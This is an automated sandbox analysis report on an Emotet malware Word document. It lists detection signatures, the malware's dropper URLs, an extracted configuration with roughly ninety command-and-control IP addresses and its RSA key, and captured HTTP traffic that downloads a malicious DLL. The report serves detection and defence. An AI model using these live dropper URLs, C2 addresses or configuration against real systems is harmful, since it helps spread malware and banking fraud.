Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name: ARCH_25_012021.doc
Analysis ID: 344852
MD5: baedc37e68b58765fa52c73d0fd2c2d5
SHA1: 2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256: 94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rundll32.exe.2e0000.1.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
Multi AV Scanner detection for domain / URL
Source: http://3musketeersent.net/wp-includes/TUgD/ Virustotal: Detection: 8% Perma Link
Source: https://skilmu.com/wp-admin/hQVlB8b/ Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: ARCH_25_012021.doc Virustotal: Detection: 57% Perma Link
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0074CC2A CryptDecodeObjectEx, 14_2_0074CC2A

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shannared.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49168 -> 84.232.229.24:80
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49169 -> 51.255.203.164:8080
Source: Traffic Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49171 -> 217.160.169.110:8080
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49173 -> 185.183.16.47:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 84.232.229.24:80
Source: Malware configuration extractor IPs: 51.255.203.164:8080
Source: Malware configuration extractor IPs: 217.160.169.110:8080
Source: Malware configuration extractor IPs: 185.183.16.47:80
Source: Malware configuration extractor IPs: 190.45.24.210:80
Source: Malware configuration extractor IPs: 187.162.248.237:80
Source: Malware configuration extractor IPs: 93.146.143.191:80
Source: Malware configuration extractor IPs: 185.94.252.27:443
Source: Malware configuration extractor IPs: 143.0.85.206:7080
Source: Malware configuration extractor IPs: 80.15.100.37:80
Source: Malware configuration extractor IPs: 85.105.239.184:443
Source: Malware configuration extractor IPs: 94.176.234.118:443
Source: Malware configuration extractor IPs: 62.84.75.50:80
Source: Malware configuration extractor IPs: 137.74.106.111:7080
Source: Malware configuration extractor IPs: 172.104.169.32:8080
Source: Malware configuration extractor IPs: 46.105.114.137:8080
Source: Malware configuration extractor IPs: 94.126.8.1:80
Source: Malware configuration extractor IPs: 78.206.229.130:80
Source: Malware configuration extractor IPs: 93.149.120.214:80
Source: Malware configuration extractor IPs: 192.175.111.212:7080
Source: Malware configuration extractor IPs: 80.249.176.206:80
Source: Malware configuration extractor IPs: 181.10.46.92:80
Source: Malware configuration extractor IPs: 190.24.243.186:80
Source: Malware configuration extractor IPs: 191.223.36.170:80
Source: Malware configuration extractor IPs: 177.23.7.151:80
Source: Malware configuration extractor IPs: 154.127.113.242:80
Source: Malware configuration extractor IPs: 51.255.165.160:8080
Source: Malware configuration extractor IPs: 87.106.46.107:8080
Source: Malware configuration extractor IPs: 85.214.26.7:8080
Source: Malware configuration extractor IPs: 190.247.139.101:80
Source: Malware configuration extractor IPs: 46.101.58.37:8080
Source: Malware configuration extractor IPs: 201.185.69.28:443
Source: Malware configuration extractor IPs: 46.43.2.95:8080
Source: Malware configuration extractor IPs: 82.208.146.142:7080
Source: Malware configuration extractor IPs: 110.39.160.38:443
Source: Malware configuration extractor IPs: 186.177.174.163:80
Source: Malware configuration extractor IPs: 51.38.124.206:80
Source: Malware configuration extractor IPs: 81.4.105.175:8080
Source: Malware configuration extractor IPs: 209.33.120.130:80
Source: Malware configuration extractor IPs: 172.245.248.239:8080
Source: Malware configuration extractor IPs: 45.16.226.117:443
Source: Malware configuration extractor IPs: 104.130.154.83:7080
Source: Malware configuration extractor IPs: 217.13.106.14:8080
Source: Malware configuration extractor IPs: 94.23.45.86:7080
Source: Malware configuration extractor IPs: 152.169.22.67:80
Source: Malware configuration extractor IPs: 12.162.84.2:8080
Source: Malware configuration extractor IPs: 201.48.121.65:443
Source: Malware configuration extractor IPs: 81.17.93.134:80
Source: Malware configuration extractor IPs: 81.215.230.173:443
Source: Malware configuration extractor IPs: 60.93.23.51:80
Source: Malware configuration extractor IPs: 122.201.23.45:443
Source: Malware configuration extractor IPs: 31.27.59.105:80
Source: Malware configuration extractor IPs: 105.209.235.113:8080
Source: Malware configuration extractor IPs: 197.232.36.108:80
Source: Malware configuration extractor IPs: 91.233.197.70:80
Source: Malware configuration extractor IPs: 87.106.253.248:8080
Source: Malware configuration extractor IPs: 138.97.60.141:7080
Source: Malware configuration extractor IPs: 152.170.79.100:80
Source: Malware configuration extractor IPs: 190.251.216.100:80
Source: Malware configuration extractor IPs: 177.85.167.10:80
Source: Malware configuration extractor IPs: 212.71.237.140:8080
Source: Malware configuration extractor IPs: 82.48.39.246:80
Source: Malware configuration extractor IPs: 213.52.74.198:80
Source: Malware configuration extractor IPs: 116.125.120.88:443
Source: Malware configuration extractor IPs: 81.214.253.80:443
Source: Malware configuration extractor IPs: 149.62.173.247:8080
Source: Malware configuration extractor IPs: 152.231.89.226:80
Source: Malware configuration extractor IPs: 206.189.232.2:8080
Source: Malware configuration extractor IPs: 181.30.61.163:443
Source: Malware configuration extractor IPs: 1.226.84.243:8080
Source: Malware configuration extractor IPs: 191.241.233.198:80
Source: Malware configuration extractor IPs: 109.101.137.162:8080
Source: Malware configuration extractor IPs: 110.39.162.2:443
Source: Malware configuration extractor IPs: 167.71.148.58:443
Source: Malware configuration extractor IPs: 5.196.35.138:7080
Source: Malware configuration extractor IPs: 190.64.88.186:443
Source: Malware configuration extractor IPs: 200.75.39.254:80
Source: Malware configuration extractor IPs: 138.97.60.140:8080
Source: Malware configuration extractor IPs: 170.81.48.2:80
Source: Malware configuration extractor IPs: 70.32.115.157:8080
Source: Malware configuration extractor IPs: 104.131.41.185:8080
Source: Malware configuration extractor IPs: 190.162.232.138:80
Source: Malware configuration extractor IPs: 188.135.15.49:80
Source: Malware configuration extractor IPs: 95.76.153.115:80
Source: Malware configuration extractor IPs: 188.225.32.231:7080
Source: Malware configuration extractor IPs: 12.163.208.58:80
Source: Malware configuration extractor IPs: 50.28.51.143:8080
Source: Malware configuration extractor IPs: 202.134.4.210:7080
Source: Malware configuration extractor IPs: 190.210.246.253:80
Source: Malware configuration extractor IPs: 149.202.72.142:7080
Source: Malware configuration extractor IPs: 138.197.99.250:8080
Source: Malware configuration extractor IPs: 68.183.190.199:8080
Source: Malware configuration extractor IPs: 211.215.18.93:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Wed, 27 Jan 2021 08:30:36 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/Last-Modified: Wed, 27 Jan 2021 08:30:36 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Wed, 27 Jan 2021 08:30:36 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.169.223.13 192.169.223.13
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shannared.com
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103532538.000000001B8B6000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
